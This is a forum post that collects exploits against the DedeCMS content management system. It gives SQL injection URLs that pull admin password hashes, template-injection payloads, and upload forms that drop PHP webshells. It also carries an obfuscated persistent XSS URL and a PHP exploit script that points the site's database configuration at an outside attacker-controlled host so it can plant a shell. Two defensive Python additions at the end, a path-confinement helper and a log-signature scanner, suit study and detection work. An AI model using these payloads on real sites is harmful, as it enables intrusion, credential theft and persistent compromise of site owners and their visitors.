DedeCMS vulnerability summary

Posted on 2012-10-18 10:42:14 (original poster)

Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the "local address" field enter: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php with password xiao, a one-line shell generated directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS (all versions) gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; afterwards, whichever of the URLs below is visited, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable overwrite getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCms v5.6-5.7 unauthorised access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you land directly in the site backend.
The precondition is that the backend path must already be known.
Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert a row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member area, publish an article and upload an image, then in attachment management replace the image with our crafted template; say the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (prepend gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the crafted part)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if it reports the edit succeeded, the template path has been changed. 3. Visit the edited article:
Assuming the article just edited has aid 2, we only need to request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after uploading, the image is stored as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
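The file-delete (edit_face.php oldface=), local-include (carbuyaction.php code=) and template-path (article_edit.php templet=) bugs above all take a caller-supplied path and resolve it without checking where it lands. As an added example that is not DedeCMS code (the install layout and the payment-module directory name are assumed), this Python helper shows the check those handlers lack: canonicalise the path and refuse anything outside the directory the feature is meant to serve.

```python
import posixpath
from urllib.parse import unquote

# Assumed install layout for the demonstration; a placeholder, not DedeCMS's real paths.
WEB_ROOT = "/var/www/dede"


def confine_path(user_value, resolve_base, allowed_dir):
    """Resolve user_value against resolve_base and return the canonical path
    only if it is a strict descendant of allowed_dir; otherwise return None.

    This is the check the handlers above lack: they join the caller's value onto
    a base directory and use the result without testing where it ended up.
    """
    value = unquote(user_value)             # %2e%2e/ and similar encodings
    if value == "" or "\x00" in value:      # empty input, NUL truncation
        return None
    base = posixpath.normpath(resolve_base)
    allowed = posixpath.normpath(allowed_dir)
    candidate = posixpath.normpath(posixpath.join(base, value.lstrip("/")))
    # trailing "/" keeps /uploads/userup2/... from passing as /uploads/userup/...
    if not candidate.startswith(allowed + "/"):
        return None
    # on a live system also resolve symlinks (os.path.realpath) before using it
    return candidate


def check_avatar_delete(oldface):
    """member/edit_face.php dopost=delold: oldface is a web-root-relative URL
    path and may only name a file under uploads/userup."""
    return confine_path(oldface, WEB_ROOT, WEB_ROOT + "/uploads/userup")


def check_templet(templet):
    """member/article_edit.php templet=: resolved inside the template directory
    and must stay there, so ../uploads/... is refused."""
    return confine_path(templet, WEB_ROOT + "/templets", WEB_ROOT + "/templets")


def check_payment_code(code):
    """plus/carbuyaction.php code=: selects an include file; the module
    directory name is assumed for this example."""
    module_dir = WEB_ROOT + "/include/payment"
    return confine_path(code, module_dir, module_dir)
```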
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, giving a 20-character value; to recover it, drop 3 more from the front and 1 from the end, which yields the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialised page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It exploits the error raised by a MySQL numeric field overflow, together with the fact that DEDECMS records database errors in a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following confirms the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the action address in the form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the output from step 2 means the file trojan was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
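As an added defender-side example that is not code from this post, the following Python classifier turns the request shapes collected above (GLOBALS overwrite, raw sql=, _Cs[] injection, template tags, templet/oldface/code traversal, gotopage markup, mysql_error_trace.php reads) into detection signatures and runs them over access-log lines; the hosts, IPs and log lines are constructed for the test.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the DedeCMS request shapes collected in this post.
# Each regex runs against the URL-decoded request target and POST body.
SIGNATURES = [
    # _COOKIE[GLOBALS][cfg_*] / _POST[GLOBALS][cfg_*]: the variable-overwrite family
    ("globals_overwrite", re.compile(r"_(?:COOKIE|POST|GET)\[GLOBALS\]\[cfg_", re.I)),
    # bare cfg_* request parameters (select_soft_post.php under register_globals)
    ("cfg_param_injection", re.compile(r"(?:^|[?&])cfg_[a-z_]+=", re.I | re.M)),
    # plus/advancedsearch.php accepting a raw sql= parameter
    ("advancedsearch_raw_sql", re.compile(r"advancedsearch\.php\?.*\bsql=", re.I)),
    # DedeCMS table-prefix placeholder, used above to reach #@__admin
    ("table_prefix_placeholder", re.compile(r"#@__")),
    # plus/rss.php _Cs[...] array injection
    ("rss_cs_injection", re.compile(r"rss\.php\?.*_Cs\[", re.I)),
    # template tags or runphp='yes' arriving inside a request
    ("template_tag_in_request", re.compile(r"\{/?dede:[a-z0-9_]+|runphp=['\"]?yes", re.I)),
    # member/article_edit.php templet= pointing outside the template directory
    ("templet_override", re.compile(r"templet=\.\./")),
    # member/edit_face.php oldface= with traversal (remote file delete)
    ("edit_face_traversal", re.compile(r"edit_face\.php\?.*oldface=[^&]*\.\./", re.I)),
    # plus/carbuyaction.php code= with traversal (local file include)
    ("carbuyaction_lfi", re.compile(r"carbuyaction\.php\?.*code=[^&]*\.\./", re.I)),
    # dede/login.php gotopage= carrying markup (the XSS above)
    ("gotopage_xss", re.compile(r"gotopage=[^&]*<", re.I)),
    # direct reads of the PHP file DedeCMS writes database errors into
    ("mysql_error_trace_access", re.compile(r"/data/mysql_error_trace\.php", re.I)),
]

# request field of an Apache/nginx combined log line: "METHOD target HTTP/x.y"
REQUEST_RX = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(text, rounds=2):
    """URL-decode up to `rounds` times so double-encoded payloads still match."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify_request(target, body=""):
    """Return the names of every signature matched by a request target and body."""
    haystack = decode_fully(target) + "\n" + decode_fully(body)
    return [name for name, rx in SIGNATURES if rx.search(haystack)]


def scan_log(lines):
    """Return (request target, matched signature names) for each suspicious line."""
    hits = []
    for line in lines:
        match = REQUEST_RX.search(line)
        if match is not None:
            names = classify_request(match.group("target"))
            if names:
                hits.append((match.group("target"), names))
    return hits


# Constructed sample log lines (placeholder IPs) in the payload shapes listed above.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512',
    '203.0.113.7 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&userid=admin&pwd=guess&_POST[GLOBALS][cfg_dbhost]=203.0.113.9 HTTP/1.1" 302 0',
    '203.0.113.7 - - [18/Oct/2012:10:42:31 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88',
    '203.0.113.7 - - [18/Oct/2012:10:42:40 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3E HTTP/1.1" 200 1024',
    # the last step of the template chain looks like ordinary traffic and gets no hit
    '198.51.100.4 - - [18/Oct/2012:10:43:02 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for target, names in scan_log(SAMPLE_LOG):
        print(", ".join(names), target)
```

POST bodies are not in an access log, so the mytag_js.php, article_edit.php and select_soft_post.php variants need classify_request() fed from a WAF or request-body capture.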